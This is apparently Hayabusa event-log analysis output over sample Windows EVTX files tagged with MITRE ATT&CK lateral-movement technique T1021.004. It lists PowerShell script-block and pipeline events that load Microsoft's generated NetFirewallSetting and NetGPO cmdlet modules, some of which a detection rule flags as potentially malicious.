server activation and config.evtx 2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.894 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.896 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.897 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.898 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.922 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] 
[Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.922 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if 
($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.923 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.923 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.924 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.924 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
